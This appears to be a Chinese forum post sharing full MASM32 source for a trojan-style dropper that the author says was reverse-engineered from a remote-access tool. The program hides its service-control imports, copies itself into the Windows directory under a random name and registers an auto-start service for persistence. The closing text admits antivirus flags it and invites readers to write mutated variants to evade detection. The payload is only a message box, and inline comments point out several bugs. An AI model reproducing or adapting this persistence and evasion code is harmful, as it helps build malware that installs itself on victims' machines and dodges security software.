本来是一个朋友给我,要我找下后门的,可是这远控太强大了,而且作者的汇编基础非常强,就没找到,倒是无巧不成书的,发现了他的隐藏技术,瞬间感觉喜欢上了,于是写成了win32分享下。3分钟前,主动防御会拦截,但是电脑重启后程序可以运行;现在又测试了下,已经变成高危病毒了,无语的360啊。。。源码如下,各位可以根据需要修改:
; Win32 x86 MASM32 listing (Intel syntax), 32-bit flat model, stdcall ABI.
; Only user32 and kernel32 are linked statically. ADVAPI32 (the service
; control APIs) is intentionally NOT included/linked here: it is loaded at
; run time with LoadLibrary/GetProcAddress in the code section, so those
; names need not appear in the static import table (the strings themselves
; remain in cleartext in .const, so string scanning still finds them).
.386
.model flat, stdcall
option casemap:none
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
;-=-=-=-=-=-=-=-=-=-=-=-=-= API / DLL name strings =-=-=-=-=-=-=-=-=-=-=-=-=-
.const
; User-visible strings and the service identity. These are the static
; indicators an analyst can key on: service name ".Test1", display name
; ".CunMang1", description string "BingDuMiaoShu", and a dropped executable
; named \<six letters>.exe in the Windows directory (see szExe and the
; WindowsName code path).
sz11 db "程序已经在windows目录下了",0          ; MessageBox text ("program is already in the Windows directory")
sz22 db "标题",0                              ; MessageBox title ("title")
szUnlockService db "UnlockServiceDatabase",0
szExe db "\%c%c%c%c%c%c.exe",0                ; wsprintf format for the dropped file name
szTest db ".Test1",0                          ; lpServiceName passed to CreateServiceA
szCunMang db ".CunMang1",0                    ; lpDisplayName passed to CreateServiceA
szMiaoShu db "BingDuMiaoShu",0                ; intended service description (see the ChangeServiceConfig2A call)
; API names looked up with GetProcAddress. They are plain cleartext here:
; avoiding the import table does not hide them from a strings scan.
szGetModuleFileName db "GetModuleFileNameA",0
szGetWindowsDirectory db "GetWindowsDirectoryA",0
szCopyFile db "CopyFileA",0
szOpenSCM db "OpenSCManagerA",0
szCloseServiceHandle db "CloseServiceHandle",0   ; resolved later but never called (handles are leaked)
szStartService db "StartServiceA",0
szChangeService db "ChangeServiceConfig2A",0
szAdvapi32 db "ADVAPI32.DLL",0
szCreateService db "CreateServiceA",0
szGetTickCount db "GetTickCount",0
szKernel db "kernel32.dll",0
szLockService db "LockServiceDatabase",0
;-=-=-=-=-=-=-=-=-=-=-= buffers and resolved function addresses =-=-=-=-=-=-=-=-=-=-=-
.data
; 128-byte path buffers. Win32 MAX_PATH is 260, so a long install path is
; truncated by the 128-byte limit passed to the path APIs in the code section.
szFileName db 128 dup(?)        ; path of the running module; later overwritten with the dropped copy's path
szWindowDirect db 128 dup(?)    ; Windows directory, e.g. C:\WINDOWS
szNullFileName db 128 dup(?)    ; Windows directory + "\<six letters>.exe" (the drop target)
szMuBiaoName db 128 dup(?)      ; never written; the author uses it as a source of zero bytes to clear szFileName
szTime dd 1                     ; LCG state used by _SuanFa (initial seed 1)
szExeBuffer db 128 dup(?)       ; output of wsprintf(szExe, ...)
HandleData dd ?                 ; SC_HANDLE returned by OpenSCManagerA
HandleCreateService dd ?        ; SC_HANDLE returned by CreateServiceA (stored, never read afterwards)
szLocalService1 dd ?            ; SC_LOCK returned by LockServiceDatabase
; Function pointers filled in at start:
addrKernel dd ?                 ; HMODULE of kernel32.dll
addrGetModuleFileName dd ?
addrGetWindowsDirectory dd ?
addrCopyFile dd ?
addrAdv dd ?                    ; HMODULE of ADVAPI32.DLL
addrOpenSCM dd ?
addrOpenService dd ?            ; declared but never resolved or used
addrCreateService dd ?
addrCloseServiceHandle dd ?     ; resolved but never called
addrLockService dd ?
addrUnlockService dd ?
addrChangeService dd ?
addrStartService dd ?
addrGetTickCount dd ?
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= code section =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
.code
;-----------------------------------------------------------------------
; _SuanFa ("algorithm") -- pseudo-random value in [0, szVar)
; DWORD _SuanFa(DWORD szVar)     stdcall; MASM emits the ebp frame and ret 4
; In:    szVar = modulus (every caller in this file passes 1Ah = 26)
; Out:   eax   = (lcg_output * GetTickCount()) mod szVar
; Clobb: eax, edx, flags; esi is saved/restored; updates the global szTime
; Note:  szVar = 0 would raise #DE on the div below (no caller does that).
;        343FDh/269EC3h (214013/2531011) are the multiplier/increment of the
;        MSVC CRT rand() LCG; the tick count is mixed in so the generated
;        file name differs per run even though szTime always starts at 1.
;-----------------------------------------------------------------------
_SuanFa proc szVar
    push esi
    call addrGetTickCount           ; indirect call through the resolved pointer
    mov esi, eax                    ; esi = tick count
    mov eax, szTime
    imul eax, eax, 343FDh           ; szTime = szTime * 214013 + 2531011 (rand()-style LCG step)
    add eax, 269EC3h
    mov szTime, eax                 ; persist the new LCG state
    sar eax, 10h                    ; keep bits 16..30 -> 0..7FFFh, as rand() does
    and eax, 7FFFh
    add eax, 3h                     ; result now in 3..8002h (author's choice)
    xor edx, edx                    ; edx must be 0: unsigned div uses edx:eax as the dividend
    imul eax, esi                   ; eax = value * tick, low 32 bits only (edx untouched)
    div szVar                       ; edx:eax / szVar
    pop esi
    mov eax, edx                    ; return the remainder
    ret
_SuanFa endp
start:
;-=-=-=-=-=-=-=-=-= ADVAPI32.DLL: service-control APIs resolved at run time =-=-=-=-=-=-=-=-=-
    ; Resolving these by name keeps them out of the static import table (the
    ; "hiding technique" the post is about); the names are still cleartext in
    ; .const. No return value from LoadLibrary/GetProcAddress is checked, so a
    ; NULL result would later be used as a call target.
    push offset szAdvapi32
    call LoadLibrary
    mov addrAdv, eax                ; HMODULE of ADVAPI32.DLL
    push offset szOpenSCM
    push addrAdv
    call GetProcAddress             ; OpenSCManagerA
    mov addrOpenSCM, eax
    push offset szCloseServiceHandle
    push addrAdv
    call GetProcAddress             ; CloseServiceHandle (never actually called below)
    mov addrCloseServiceHandle, eax
    push offset szStartService
    push addrAdv
    call GetProcAddress
    mov addrStartService, eax       ; StartServiceA
    push offset szLockService
    push addrAdv
    call GetProcAddress
    mov addrLockService, eax        ; LockServiceDatabase
    push offset szUnlockService
    push addrAdv
    call GetProcAddress
    mov addrUnlockService, eax      ; UnlockServiceDatabase
    push offset szChangeService
    push addrAdv
    call GetProcAddress
    mov addrChangeService, eax      ; ChangeServiceConfig2A
    push offset szCreateService
    push addrAdv
    call GetProcAddress
    mov addrCreateService, eax      ; CreateServiceA (addrOpenService is never resolved)
;-=-=-=-=-=-=-=-=-=-=-= kernel32: path and file APIs resolved at run time =-=-=-=-=-=-=-=-=-=-=-
    push offset szKernel
    call GetModuleHandle
    mov addrKernel, eax             ; HMODULE of kernel32.dll (already loaded, so no LoadLibrary)
    push offset szGetModuleFileName
    push addrKernel
    call GetProcAddress
    mov addrGetModuleFileName, eax  ; GetModuleFileNameA
    push offset szGetWindowsDirectory
    push addrKernel
    call GetProcAddress
    mov addrGetWindowsDirectory, eax ; GetWindowsDirectoryA
    push offset szCopyFile
    push addrKernel
    call GetProcAddress
    mov addrCopyFile, eax           ; CopyFileA
    push offset szGetTickCount
    push addrKernel
    call GetProcAddress
    mov addrGetTickCount, eax       ; GetTickCount
    ; --- Where is this exe running from? ----------------------------------
    push 128
    push offset szFileName
    push NULL
    call addrGetModuleFileName      ; GetModuleFileNameA(NULL, szFileName, 128): full path of this exe
    push 128
    push offset szWindowDirect
    call addrGetWindowsDirectory    ; GetWindowsDirectoryA(szWindowDirect, 128), e.g. C:\WINDOWS
    push 128
    push offset szNullFileName
    call addrGetWindowsDirectory    ; same directory again; this copy gets the file name appended later
    ; strlen(szWindowDirect) with repne scasb: edi ends one past the NUL
    mov edi, offset szWindowDirect
    mov ebx, edi
    mov ecx, 128                    ; scan at most 128 bytes (not 0FFFFFFFFh as the original comment said)
    mov al, 0                       ; byte to find: the terminating NUL
    cld
    repne scasb                     ; stops when ecx = 0 or ZF = 1 (NUL found)
    sub edi, ebx                    ; edi = length including the NUL
    sub edi, 1                      ; drop the NUL -> plain length
    mov ecx, edi                    ; ecx = number of bytes to compare
    mov esi, offset szFileName      ; module path
    mov edi, offset szWindowDirect  ; Windows directory
    ; Byte-for-byte compare of the first len(szWindowDirect) bytes of the
    ; module path against the Windows directory, i.e. a case-sensitive prefix
    ; test. NOTE(review): any path under %WINDIR% (system32\ included) also
    ; passes, and a differently-cased path (c:\windows\...) does not.
    ; NOTE(review): if ecx were 0 (empty directory string) `loop` would wrap
    ; and run 0FFFFFFFFh iterations -- not expected in practice, but unguarded.
s:
    mov al, [esi]
    mov bl, [edi]
    cmp al, bl
    jnz WindowsName                 ; mismatch: NOT in %WINDIR% yet -> drop a copy there (label name is misleading)
    inc esi
    inc edi
    loop s
    jmp _Service                    ; whole prefix matched: already in %WINDIR% -> register the service only
WindowsName:
    ; Reached when the exe is NOT yet in %WINDIR% (despite the label name).
    ; Build a random six-letter file name: six calls to _SuanFa(26) + 'a' (61h).
    ; Every `mov ecx, 1Ah` below is dead code -- ecx is never read afterwards.
    push 1Ah
    call _SuanFa
    mov ecx, 1Ah
    push 61h
    pop edi                         ; edi = 'a'; _SuanFa does not touch edi, so it survives the remaining calls
    add eax, edi
    push eax                        ; character 1 (pushed first, so it lands in the last %c of the format)
    push 1Ah
    call _SuanFa
    mov ecx, 1Ah
    add eax, edi
    push eax                        ; character 2
    push 1Ah
    call _SuanFa
    mov ecx, 1Ah
    add eax, edi
    push eax                        ; character 3
    push 1Ah
    call _SuanFa
    mov ecx, 1Ah
    add eax, edi
    push eax                        ; character 4
    push 1Ah
    call _SuanFa
    mov ecx, 1Ah
    add eax, edi
    push eax                        ; character 5
    push 1Ah
    call _SuanFa
    mov ecx, 1Ah
    add eax, edi
    push eax                        ; character 6
    push offset szExe
    push offset szExeBuffer
    call wsprintf                   ; szExeBuffer = "\abcdef.exe"
                                    ; NOTE(review): wsprintf is cdecl; the 8 dwords pushed for it are
                                    ; never popped. Harmless only because this path ends in ExitProcess.
    invoke lstrcat, offset szNullFileName, offset szExeBuffer   ; szNullFileName = %WINDIR%\abcdef.exe
    push TRUE
    push offset szNullFileName
    push offset szFileName
    call addrCopyFile               ; CopyFileA(szFileName, szNullFileName, bFailIfExists = TRUE)
                                    ; NOTE(review): return value ignored. Writing into %WINDIR% normally
                                    ; needs administrative rights; if the copy fails, the service below is
                                    ; still registered with a path that does not exist. This drop (new exe
                                    ; in %WINDIR% + new auto-start service) is the behavior AV heuristics
                                    ; flag, independent of the harmless MessageBox payload.
    invoke RtlMoveMemory, offset szFileName, offset szMuBiaoName, 120   ; zero the first 120 bytes of szFileName
    invoke RtlMoveMemory, offset szFileName, offset szNullFileName, 120 ; szFileName = path of the dropped copy
                                    ; (120 of the 128 bytes; a path of 120+ chars would lose its NUL)
    invoke MessageBox, NULL, offset szNullFileName, offset szWindowDirect, MB_OK   ; debug aid: show the drop path
    jmp Windows
_Service:
    ; Reached when the module path already starts with %WINDIR%: tell the
    ; user, then fall through into the service registration at Windows:.
    invoke MessageBox, NULL, offset sz11, offset sz22, MB_OK
Windows:
    ; Persistence: register szFileName as an auto-start service.
    push SC_MANAGER_ALL_ACCESS      ; 0F003Fh (author: seen in OllyDbg; IDA "Use Standard Symbolic Constant")
    push NULL                       ; lpDatabaseName = NULL -> SERVICES_ACTIVE_DATABASE
    push NULL                       ; lpMachineName = NULL -> local machine
    call addrOpenSCM                ; OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS)
    mov HandleData, eax             ; SC_HANDLE, 0 on failure (e.g. when not running elevated)
    mov edi, eax                    ; keep the handle in edi; eax is reused below
    xor ebx, ebx
    cmp edi, ebx
    jz _exit                        ; SCM could not be opened -> give up silently
    mov eax, ebx                    ; dead: eax/ebx shuffle with no effect, ebx is zeroed again right after
    mov ebx, eax
    xor ebx, ebx
    ; CreateServiceA(hSCM, ".Test1", ".CunMang1", SERVICE_ALL_ACCESS,
    ;                SERVICE_WIN32_OWN_PROCESS or SERVICE_INTERACTIVE_PROCESS,
    ;                SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, szFileName,
    ;                NULL, NULL, NULL, NULL, NULL)
    push ebx                        ; lpPassword
    push ebx                        ; lpServiceStartName (NULL -> LocalSystem)
    push ebx                        ; lpDependencies
    push ebx                        ; lpdwTagId
    push ebx                        ; lpLoadOrderGroup
    push offset szFileName          ; lpBinaryPathName: the dropped copy, or this exe if already in %WINDIR%
    push SERVICE_ERROR_NORMAL
    push SERVICE_AUTO_START         ; run at every boot -- this is the actual persistence
    push SERVICE_WIN32_OWN_PROCESS or SERVICE_INTERACTIVE_PROCESS
    push SERVICE_ALL_ACCESS
    push offset szCunMang           ; display name
    push offset szTest              ; service name
    push edi                        ; hSCManager
    call addrCreateService
    mov HandleCreateService, eax    ; NOTE(review): neither checked for 0 nor used by the calls below
    push edi
    call addrLockService            ; LockServiceDatabase(hSCM)
    mov szLocalService1, eax
    ; ChangeServiceConfig2A(hService = 0, dwInfoLevel = 1 (SERVICE_CONFIG_DESCRIPTION), lpInfo = szMiaoShu)
    ; NOTE(review): as written this call cannot succeed -- hService is 0 rather
    ; than HandleCreateService, and lpInfo points at the raw string where the
    ; API expects a SERVICE_DESCRIPTIONA structure. No description is set.
    push offset szMiaoShu
    push 1
    push 0
    call addrChangeService
    push szLocalService1
    call addrUnlockService          ; UnlockServiceDatabase(lock)
    ; StartServiceA(hService = 0, dwNumServiceArgs = 0, lpServiceArgVectors = NULL)
    ; NOTE(review): again hService is 0, so nothing starts now; the service
    ; only runs at the next boot via SERVICE_AUTO_START, which is what the
    ; author's "works after reboot" remark describes. The listing has no
    ; StartServiceCtrlDispatcher/ServiceMain, so when the SCM launches it the
    ; process will presumably be reported as not responding -- TODO confirm.
    ; Neither the service handle nor the SCM handle is ever closed.
    push 0
    push 0
    push 0
    call addrStartService
_exit:
    ; Common exit; also the target of the OpenSCManagerA failure check above.
    invoke ExitProcess, NULL
end start
很简单,有效载荷本身没有什么危害性操作,只是弹出个对话框提示下;不过需要说明的是,程序会把自身复制到 Windows 目录下(随机 6 个小写字母的文件名)并注册为自启动服务(服务名 .Test1),杀软判定为高危的正是这种持久化行为,而不是对话框本身。一天一夜逆出来的,很累,再加上360的捣乱,实在没心情重写了,各位看懂后,就写个变形的吧,唉,喝豆奶粉补充下营养去。。。(只限技术交流)